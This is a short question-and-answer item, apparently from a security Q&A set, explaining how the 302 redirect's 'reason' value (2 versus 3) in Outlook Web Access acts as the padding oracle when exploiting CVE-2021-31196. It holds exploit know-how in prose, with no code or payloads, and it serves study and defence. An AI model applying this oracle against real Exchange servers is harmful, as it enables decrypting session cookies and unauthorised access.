How can an attacker determine whether the decryption of a modified ciphertext succeeded when exploiting CVE-2021-31196?

After sending a GET request to `/owa/` with the crafted cookie, the server returns a 302 redirect. The response body contains a `reason` parameter in the redirect URL. If `reason=2`, it means `InvalidCredentials` (the decryption succeeded but the credentials were invalid), confirming that the padding oracle returned a valid decryption. If `reason=3` (Timeout), the cookie has expired and the attack cannot proceed. This feedback mechanism is the core of the Padding Oracle Attack, as detailed in the open-source code example.